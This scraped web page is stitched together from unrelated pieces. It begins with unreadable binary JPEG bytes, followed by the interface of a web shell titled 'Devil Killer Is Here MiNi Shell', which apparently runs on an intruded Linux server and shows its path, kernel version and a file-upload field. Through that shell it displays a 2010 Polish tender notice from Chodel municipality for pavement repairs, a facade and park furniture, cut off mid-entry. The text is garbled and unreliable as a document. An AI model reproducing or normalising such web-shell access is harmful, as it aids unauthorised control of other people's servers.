JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100929/268425-N-2010.html

<p class="kh_header"><b>Chodel: Zagospodarowanie przestrzeni publicznych o szczególnym znaczeniu dla zaspakajania potrzeb ludności, w tym zabytkowej części miejscowości Chodel 
poprzez:

Zadanie I.
Remont części chodników w ul. Rynek, Nadrzeczna, Targowa, Leśna, Maciejowskiego oraz uzupełnienie objętego ochroną konserwatorską fragmentu nawierzchni brukowanej,
Zadanie II)	
1)Wykonanie elewacji na budynku remizy strażackiej (kina) w Chodlu,
2)Przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką,
Zadanie III)	
Urządzenie i wyposażenie terenu zielonego w elementy małej architektury ogrodowej .</b><br>
<b>Numer ogłoszenia: 268425 - 2010; data zamieszczenia: 29.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chodel , ul. Partyzantów 24, 24-350 Chodel, woj. lubelskie, tel. 81 829 10 26, faks 81 829 10 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chodel.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie przestrzeni publicznych o szczególnym znaczeniu dla zaspakajania potrzeb ludności, w tym zabytkowej części miejscowości Chodel 
poprzez:

Zadanie I.
Remont części chodników w ul. Rynek, Nadrzeczna, Targowa, Leśna, Maciejowskiego oraz uzupełnienie objętego ochroną konserwatorską fragmentu nawierzchni brukowanej,
Zadanie II)	
1)Wykonanie elewacji na budynku remizy strażackiej (kina) w Chodlu,
2)Przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką,
Zadanie III)	
Urządzenie i wyposażenie terenu zielonego w elementy małej architektury ogrodowej ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I)	
Remont części chodników w ul. Rynek, Nadrzeczna, Targowa, Leśna, Maciejowskiego oraz uzupełnienie objętego ochroną konserwatorską fragmentu nawierzchni brukowanej:

-Chodniki z kostki betonowej kolorowej gr. 6 cm na podsypce 
cem-piask  gr. 50 mm, z wypełnieniem spoin piaskiem 763,85 m2

-Wjazdy do posesji z kostki betonowej szarej gr. 8 cm na podsypce 
cem-piask gr. 50 mm, z wypełnieniem spoin zaprawą cementową-	106,70

-Krawężniki betonowe wystające o wymiarach 15 x 30 cm z
 wykonaniem ław betonowych na podsypce cem-piask .495,20 mb

-Obrzeża betonowe  o wymiarach 20 x 6 cm  na podsypce
 piaskowej, spoiny wypełnione piaskiem 188,40 mb

-Uzupełnienie nawierzchni kamiennej w uliczce, łączącej 
ul. Rynek z ul. Nadrzeczną -	18,20 m2

Zadanie II)	
Wykonanie elewacji na budynku remizy strażackiej (kina) w Chodlu oraz 
przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką

1)	Wyprawa elewacyjna cienkowarstwowa o fakturze rustykalnej, 
	z gotowej suchej mieszanki , wykonywana ręcznie		-	263,48 m2

2)	przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką, poprzez usunięcie humusu, uzupełnienie niedoboru ziemi, plantowanie placu obsianie placu trawą 700,00 m2 	

Zadanie III)	
Urządzenie i wyposażenie terenu zielonego w n/w elementy małej architektury ogrodowej:

-stół betonowy rekreacyjny do gry w piłkarzy ki			-  1 szt
-stół betonowy rekreacyjny do gry w szachy i chińczyka		-  2 szt
-ławka parkowa betonowa bez oparcia				-  4 szt
-ławka parkowa żeliwna z oparciem				-  2 szt
-kosz uliczny betonowy z daszkiem o poj. 26 l			-10 szt
-donica uliczna betonowa śr. 70 cm, wys. 40 cm		-   4 szt
-gablota zewnętrzna - wolnostojąca 10 x A4			-   1 szt
-gablota zewnętrzna - wolnostojąca 8 x A4			-   1 szt

     3.2.	Szczegółowy zakres robót zawarty jest w kosztorysach ofertowych   (zał. Nr  9a, 9b, 9c).

     3.3.	Na każde z w/w zadań zostanie zawarta oddzielna umowa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Ewentualne zamówienie uzupełniajacwe będzie polegało na powtórzeniu tego samego rodzaju robót budowlanych jakie przewidziano w zamówieniu podstawowym o wartości nie większej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 upzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.45.30.00-7, 45.11.10.00-8, 37.53.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie kierował się regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie kierował się regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w SIWZ.
W celu potwierdzenia tego warunku wykonawca dołączy wykaz co najmniej dwóch robót polegających na:

- budowie, remoncie chodników i placów z kostki brukowej o wartości brutto
100 000 PLN każda - dla zadania nr I  
-wykonywaniu robót budowlanych wykończeniowych i ziemnych o wartości brutto
30 000 PLN każda - dla zadania nr II 
    -sprzedaży i dostawach elementów małej architektury ogrodowej o wartości brutto 25 000 PLN każda - dla zadania nr III  

wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie, z podaniem ich  rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dokumentów  potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone   - wg załącznika nr 5 do SIWZ).
Zamawiający będzie kierował się regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy robót budowlanych, w celu realizacji zamówienia  wraz z informacją o podstawie dysponowania  tymi zasobami, obejmujący co najmniej:

- dla zadania nr I):
- koparkę kołową o poj. łyżki min. 0,25 m3 -  1 szt
- samochód samowyładowczy o ładowności do 5 ton - 1 szt,
- wibrator do zagęszczania gruntu 100-200 kg - 1 szt 
- piła do cięcia płytek - 1 szt

- dla zadania nr II):
- wyciąg jednomasztowy  -  1 szt
- betoniarka wolnospadowa elektryczna - 1 szt,
- koparko-spycharka 0,15 m3 -  1 szt
- samochód samowyładowczy o ładowności do 5 ton - 1 szt,

wg załącznika nr 6  do SIWZ
Zamawiający będzie kierował się regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia tego warunku wykonawca dołączy:5)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnymi do wykonania zamówienia oraz  informacją o podstawie dysponowania tymi osobami wg załącznika nr 8 do SIWZ - dla Zadania nr 1 i Nr 2
Zamawiający będzie kierował się regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty. oraz kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. W przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

I. Zmiana terminu przewidzianego na zakończenie robót:
1) zmiany spowodowane warunkami atmosferycznymi w szczególności:
    a)  klęski żywiołowe;
    b)  warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót 
         budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
3)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:
a)	wstrzymanie robót przez Zamawiającego ze względu na czynniki, których Zamawiający 
nie mógł przewidzieć,
b)	konieczność usunięcia błędów, których nie można było wykryć, 
c)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemoż-
       liwością prowadzenia prac lub wykonywania innych czynności przewidzianych Kontraktem, 
4)	 w przypadku kradzieży, zniszczenia, wandalizmu obiektów i urządzeń przez osoby trzecie w trakcie realizacji umowy, a Wykonawca dołożył należytej staranności w zabezpieczeniu mienia i to wykaże. 

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin przewidziany na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

  II. Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w
       szczególności następującymi okolicznościami:
1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji przetargowej, spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji, pozwalających na 
zaoszczędzenie kosztów realizacji przedmiotu umowy, z tym, że wszystkie elementy oceniane nie mogą być mniej korzystne dla Zamawiającego lub kosztów eksploatacji wykonanego przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości robót;
3)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na 
zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy, które nie odbiega od rynkowych uwarunkowań;
4)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;	

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt II możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń.

III. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:

1)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne, 
spełniające warunki określone w SIWZ np. osób z uprawnieniami;
2)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
3)	zmiana obowiązującej stawki VAT;
4)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na 
skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
	5)   rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
6)   zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego; 
      (tzw. rażąca strata)
5)	 gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.

W przypadku wystąpienia okoliczności wymienionych wyżej, możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót.
W przypadku określonym w pkt 3, zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części, jakiej dotyczą te zmiany przepisów. 

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1)    zmiany danych teleadresowych,
2)    zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku 
        bankowego);
3)    udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach  publicznych;

Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia  i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chodel.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gmimny Chodel ul. Partyzantów 24, 24-350 Chodel..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2010 godzina 10:00, miejsce: Urząd Gmimny Chodel ul. Partyzantów 24, 24-350 Chodel..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 413  Wdrazanie lokalnych strategii rozwoju w zakresie operacji odpowiadajacych warunkom przyzynania pomocy w ramach dzialania  Odnowa i Rozwoj wsi objetego PROW na lata 2007  2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZadanieI)
Remont części chodników w ul. Rynek, Nadrzeczna, Targowa, Leśna, Maciejowskiego oraz uzupełnienie objętego ochroną konserwatorską fragmentu nawierzchni brukowanej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont części chodników w ul. Rynek, Nadrzeczna, Targowa, Leśna, Maciejowskiego oraz
 uzupełnienie objętego ochroną konserwatorską fragmentu nawierzchni brukowanej:

-	Chodniki z kostki betonowej kolorowej gr. 6 cm na podsypce 
cem-piask  gr. 50 mm, z wypełnieniem spoin piaskiem 		-	763,85 m2

-	Wjazdy do posesji z kostki betonowej szarej gr. 8 cm na podsypce 
cem-piask gr. 50 mm, z wypełnieniem spoin zaprawą cementową-	106,70

-	Krawężniki betonowe wystające o wymiarach 15 x 30 cm z
 wykonaniem ław betonowych na podsypce cem-piask.		-	495,20 mb

-	Obrzeża betonowe  o wymiarach 20 x 6 cm  na podsypce
 piaskowej, spoiny wypełnione piaskiem			-	188,40 mb

-	Uzupełnienie nawierzchni kamiennej w uliczce, łączącej 
ul. Rynek z ul. Nadrzeczną					-	18,20 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II)	1)	Wykonanie elewacji na budynku remizy strażackiej (kina) w Chodlu,
		2)	Przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie elewacji na budynku remizy strażackiej (kina) w Chodlu oraz 
